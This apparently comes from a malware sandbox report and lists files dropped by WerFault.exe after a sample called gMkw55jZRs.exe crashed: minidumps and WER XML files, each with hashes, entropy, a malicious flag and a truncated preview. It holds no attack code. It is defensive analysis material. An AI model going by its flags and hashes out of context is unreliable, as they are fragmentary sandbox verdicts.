                                    Entropy (8bit):0.8839383013026361
                                    Encrypted:false
                                    SSDEEP:96:atE70+Ncsah+SoA7JfPQXIDcQnc6rCcEhcw3rr+HbHg/8BRTf3Oy1F/cIP2FUtZE:v0+NcOd056rAjuSZr+3zuiFMZ24IO8P
                                    MD5:254CA3D69A7708ECE3E92A255A32C549
                                    SHA1:B9D533921CF5F9761400B6DC500D73962B95F896
                                    SHA-256:B656B5B14360B15E8638F683C6F22F50228D2713C14A72511A7C585328C3047A
                                    SHA-512:FF2A9705C952972E4F333FB529759B676DE8E63ED9A0A77F1667AD866EED3093CE90F5A794E122906489016B8456757410ED0FDC023B92D0DA9DDD7128932697
                                    Malicious:true
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.1.5.8.1.4.2.8.1.5.3.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.9.6.f.8.c.1.2.-.c.a.b.8.-.4.e.8.c.-.b.0.7.f.-.3.f.b.5.9.b.d.2.4.9.6.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.1.4.1.8.c.d.8.-.1.4.c.a.-.4.0.e.5.-.9.3.b.f.-.a.9.6.b.e.7.a.0.a.2.2.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.g.M.k.w.5.5.j.Z.R.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.d.c.-.0.0.0.1.-.0.0.1.4.-.3.1.5.b.-.5.4.1.d.4.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.8.5.2.3.8.c.3.1.0.2.1.1.d.4.7.8.e.4.9.a.6.6.d.2.c.3.9.1.3.7.4.0.0.0.0.f.f.f.f.!.0.0.0.0.d.5.f.d.6.1.3.5.0.9.f.4.3.c.f.4.b.9.5.d.e.8.c.e.6.e.7.b.5.e.c.4.8.b.8.3.9.c.7.f.!.g.M.k.w.5.5.j.Z.R.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.g.M.k.w.5.5.j.Z.R.s...e.x.e.....B.o.o.t.I.d.=.4.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 06:13:06 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):60182
                                    Entropy (8bit):1.8053422432826505
                                    Encrypted:false
                                    SSDEEP:192:OZ8sQmCeaG7XLFOAOJwA1MiY4tY8PVrv/8tJSc12Oy3jPaPaF2D7yXh4jv0:O8rmCeaBAEPptYMLuyzaPjeXm0
                                    MD5:8FDE8D9FCAED1FA6D023BD01BA53BE18
                                    SHA1:EEB9FF72511A072DB5226B8C5C18ED7E52FAC22B
                                    SHA-256:5F7616C9724641A8A76A8A8B38ED7101685AA0206B44ADCDE2A11D8924997E9F
                                    SHA-512:E436E7A81F788A54BE3FF449F316CEC368176195EB135D9EFF8B7FD93C4846214DF24FAEE1ACA1C05F1D67020E469DDF0FDE06E76FE5DAEEB462C9340DB58A36
                                    Malicious:false
                                    Preview:MDMP..a..... .......r..g............4...............<...........0*..........T.......8...........T............2..............X...........D...............................................................................eJ..............GenuineIntel............T...........g..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8336
                                    Entropy (8bit):3.699541642280891
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJJjE6ql6Y9sSUengmfu0cmpDRC89blKsf0v/Xm:R6lXJdE6I6Y2SUengmfGo7lpfj
                                    MD5:D6E3E71FF339DC4B8CE890A7409C540E
                                    SHA1:38767C2E7528CB116FE72A1F30CC39430E9D8388
                                    SHA-256:F17A7BD160F52D50C8798FC7002E6A2D25F88979ECFBE901852B876047F3DE31
                                    SHA-512:F33188BD5C4AFC1A1AE8420F65BA2C3C5E5F3F3311E3FF6532048B119F476D57757C7C7568C731F0E6BA9715EC03BC896660EAC2DBD000CBD273B9A6F312ACB3
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.7.6.<./.P.i.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4579
                                    Entropy (8bit):4.473073423367359
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsiJg77aI9B2WpW8VYnYm8M4JykitiLFdEWE+q8RwDwLTSSqRNWRfd:uIjfwI7zX7VfJykwis5iwcLmNRNWRfd
                                    MD5:CE4436E64009CECD24FE58C99A99720C
                                    SHA1:AE626CC2426E3D60530A62C09E3CD304558A8DC9
                                    SHA-256:223C6ADB175ABD8C8265245897C0B6AF55BDF2EB13E05C3F18B1F4C646AC0DF3
                                    SHA-512:0F5BAEE1D24A8DEC86A3752BE3A7D2255F28971932228E07545D70807FFE5F26A9C1E55F43C1BB918EE7F80C9F1B525E251B62DE85E92E2A99854487EE1152C4
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534075" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 06:12:59 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):85424
                                    Entropy (8bit):1.82130243245861
                                    Encrypted:false
                                    SSDEEP:384:U1d0T/lIRsAEhpfNfOYg6szv1U21oTjvrcs0G:U1s/GRsAEhpfNXO1j+jm
                                    MD5:722FA670ACB9D54FF1F493CDBDE6B6FA
                                    SHA1:0B92DB4D1BF6A7C4CEF7D4384E6B54A7B4964431
                                    SHA-256:4401A9FB1401F5BDFA0C18A7EA55E301895330459D15356C4D72C16817F015DD
                                    SHA-512:11922F7B94FECD8DBA8B4722AFAB20EADD8AD5506B453D127467FE9DF6932B71586210330FA86852BB77EE030623547D755173F66E16D9FDAFFBDDA9D8EBABD6
                                    Malicious:false
                                    Preview:MDMP..a..... .......k..g.........................................0..........T.......8...........T................-......................................................................................................eJ......d.......GenuineIntel............T...........g..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8374
                                    Entropy (8bit):3.7045748597306356
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJJ/6k6Y9+SUznLgmfuPnpBt89b2KsfEym:R6lXJx6k6Y0SUzLgmfmi2pfg
                                    MD5:277E93DC538FE05AB53A9875980C70B3
                                    SHA1:8384B20DA8B4CC646ADDF4D5053C9311FE770160
                                    SHA-256:327A8CF863FD641E57840FACC201F5E9EBD0454A00B19E15202FAA9AC470EEEE
                                    SHA-512:CACB01A8CF9727C89E1ADD26C322358864BF4FAB474CCFDF1D0DD2AEBF6D6533853DDA526D79BF7D5BF145CE883A59AAD5559F8FB73E9C8AE6C9664502D795BE
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.7.6.<./.P.i.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4619
                                    Entropy (8bit):4.504796586521245
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsiJg77aI9B2WpW8VYVYm8M4Jyki4FH+q8RkaTSSqRNWRfd:uIjfwI7zX7V9Jyk9ijmNRNWRfd
                                    MD5:1B98589ED1D7F42C17FD62E562C205B9
                                    SHA1:9E26091F115F1593E114199314278E125F0D7AC9
                                    SHA-256:82E13B4C82272ED981CCEBBBFA0A9BBA61798118439760610F5FD4742113AB9C
                                    SHA-512:46BAF6BA0BC2F20A0EA13E668D1F555DC317F82F4E6F9BE00695D3606AEE8669EED130A0F509EC64FC9EE8D8C2AB6C80E7718C21DCD1B55083263DBAEEA8B1F1
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534075" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 06:12:59 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):85316
                                    Entropy (8bit):1.8408162895063744
                                    Encrypted:false
                                    SSDEEP:384:i0T/lI1cAEQs8Vfy5jnDibU21oTjvEADX2Wn6:H/G1cAEQDWbaj+jvxn
                                    MD5:E2025BFFFF4F63392B1F1CBE5E5B155E
                                    SHA1:8659B7A5EDC257C9CF9C5FEC155ACDB2534B4B78
                                    SHA-256:CDE07243FC230406B64C4EB89281013D5B2FC31D9FEB404C93DAB4A52E8F308C
                                    SHA-512:9136CA799D00AA927D6DDF5041A31486A8BA461A565DA27CA23CCAF540BC6FB5F99362E5072A2F8052428EBFE9825BBE56C7741713F39CF73DE141AAAAB5A328
                                    Malicious:false
                                    Preview:MDMP..a..... .......k..g.........................................0..........T.......8...........T...........h ...,......................................................................................................eJ......d.......GenuineIntel............T...........g..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8374
                                    Entropy (8bit):3.7021635545707072
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJJ/6wbc7C6Y9FSU0nCgmfuPnpBa89bzKsffxm:R6lXJh626YvSU0Cgmfmbzpfk
                                    MD5:B0AC52505FFF4BFFB78FA9002DC88E57
                                    SHA1:D08539B4568CF6A7FB15A4C8A0EE78C5C194B5C2
                                    SHA-256:6E394A8DE91A5104D60A00B406515577A25FB925323F4F6E873F07C8396BFE49
                                    SHA-512:0B60597430438922B56E4159414CD5E6FDA1498C842F4E70F568A49C8009B29C435F811E3A6083ACDBAB56390500A028EB08F93C7F5C6BC89BDEE974C85DA44D
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.7.6.<./.P.i.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4619
                                    Entropy (8bit):4.50642930241465
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsiJg77aI9B2WpW8VYjYm8M4Jyki4FKA+q8RkaTSSqRNWRfd:uIjfwI7zX7V/JykbijmNRNWRfd
                                    MD5:7B545FAF509B80BC4FDD0B81A692B41B
                                    SHA1:CDAAF3944293EEA676ED2BB66AF0152C222C44D7
                                    SHA-256:8CA44A888826B60EB1B1D55FC668C55E6A1E1443892BC639F07EBCE506B10527
                                    SHA-512:A0CD5BFB006F9CA5EFF71A062D068ED094F40CEA3C5A8C0C954493B4F4A92D55478AB9511AA4B7BC70E1B76A97360A6D8CAA8253EE0F76CEFE1E7AD681818004
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534075" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 06:13:00 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):95028
                                    Entropy (8bit):1.6953007737918808
                                    Encrypted:false
                                    SSDEEP:384:yKLNTzYfMAE96GESDiPsexGoTjvoPYlxR+Ufu:yI/YkAEE7S8hjsOG
                                    MD5:0B854A38785CD755D04D0BEBD5D4368A
                                    SHA1:5213D50005D5BE99B50B102FB375CC0E934A950D
                                    SHA-256:610AE743860E5C7A85C51DF5D69B23C9E4262EDC1772E23DD8A2248B7BC60536
                                    SHA-512:23806ECBF40F68FF351044ED1FA1B09BF9957DCA73320A43F8D896A26AEC9A1CB4D2D343D0CC54B6EE3A7E17FCC86799F8E3BFB30128DABFC9971D5C9E2DE1B6
                                    Malicious:false
                                    Preview:MDMP..a..... .......l..g............T...............\............6..........T.......8...........T............!..<Q..........@...........,...............................................................................eJ..............GenuineIntel............T...........g..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8374
                                    Entropy (8bit):3.7045673813899245
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJJW6DPx6Y9VSU0nCgmfuPnpBB89bzKsfnyxm:R6lXJo6N6YvSU0CgmfmGzpfn9
                                    MD5:0307AE486F3DE30CC3942679EA59C23D
                                    SHA1:EAB3BBD079239B080AB1DA95EFFCBA3C86289363
                                    SHA-256:4D62D69A441DDFAAD4FB0AEB8448D2E364365A9998E782CE85F1660DAB97BDE2
                                    SHA-512:9C34684BB16E80333F79520D6569E7B168A9D4FE76720CF21BFA305C277B946BBEFEBA6C20B4098BB308C7C99CA296580538223DCA50FBDCEE3D3CE685EC50B8
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.7.6.<./.P.i.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4619
                                    Entropy (8bit):4.504067928137031
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsiJg77aI9B2WpW8VYTYm8M4Jyki4Fn+q8RkaTSSqRNWRfd:uIjfwI7zX7VzJykVijmNRNWRfd
                                    MD5:2387D41986430EBC8B79123ECD7F4A74
                                    SHA1:D25EA698E33750D71AA33F8D1CBC275E6330A419
                                    SHA-256:429933125310B7099DC2BAD05BE05992538BFE2C6C1E7A7ACD5B22A9261D456F
                                    SHA-512:04C26E3A85D8F5509C8E3F2E314531175B4BB175621B2C8A32F5C32EBF5041970440288FCF741BB2F9C14537A0CCA18708B18B6ADC3B53A62489ED00F689BEE6
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534075" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 06:13:01 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):94584
                                    Entropy (8bit):1.7033248210349097
                                    Encrypted:false
                                    SSDEEP:384:VNTzYdfAE1Gwu+s8SDi0W/oTjvArY0kO+dHm:r/YVAE1vF09jUDkOUm
                                    MD5:D20CB013AD1FC3AB8EABCC9A31DE00B8
                                    SHA1:D27D23A6D4DD7DDFDA8017AC46DB57C2ED5F1921
                                    SHA-256:CB0D56506D06A9F43E86303CD46AD215FB5DFEDFE86EE6B4FDDC2CA6A358A85F
                                    SHA-512:7EADBC68DB62C84C2E360C7BEAD70D4775EA8F2C8E2304A39CC5FCC16234DD055F3967E3BC974D240DB0F78AA6C5996453D9688F2D4FF4F3EF3582FA287232E0
                                    Malicious:false
                                    Preview:MDMP..a..... .......m..g............T...............\............6..........T.......8...........T............!...O..........@...........,...............................................................................eJ..............GenuineIntel............T...........g..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8372
                                    Entropy (8bit):3.7049503261646732
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJJ9l6k+djK6Y9XSU0nCgmfuPnpBv89bqKsfwum:R6lXJZ6I6YNSU0Cgmfm4qpfQ
                                    MD5:771076EF4513FF9304F3E9E96E6F8E1E
                                    SHA1:CE6B10B93BF49E947AA9CFD3A69132CB1BC496B1
                                    SHA-256:B5091EC4EAD5D662AAD6801984E674B85146A132DFA8803008A7DC47B2F30161
                                    SHA-512:DB84F6EA54472765FBF7F5AE5D553CB2F19C99A12CF25A11899FEBBD19C5159FD047B47B38160D15F49FC2EE0476505433870F6C2064BEABE5D3EA64CD4C6D13
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.7.6.<./.P.i.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
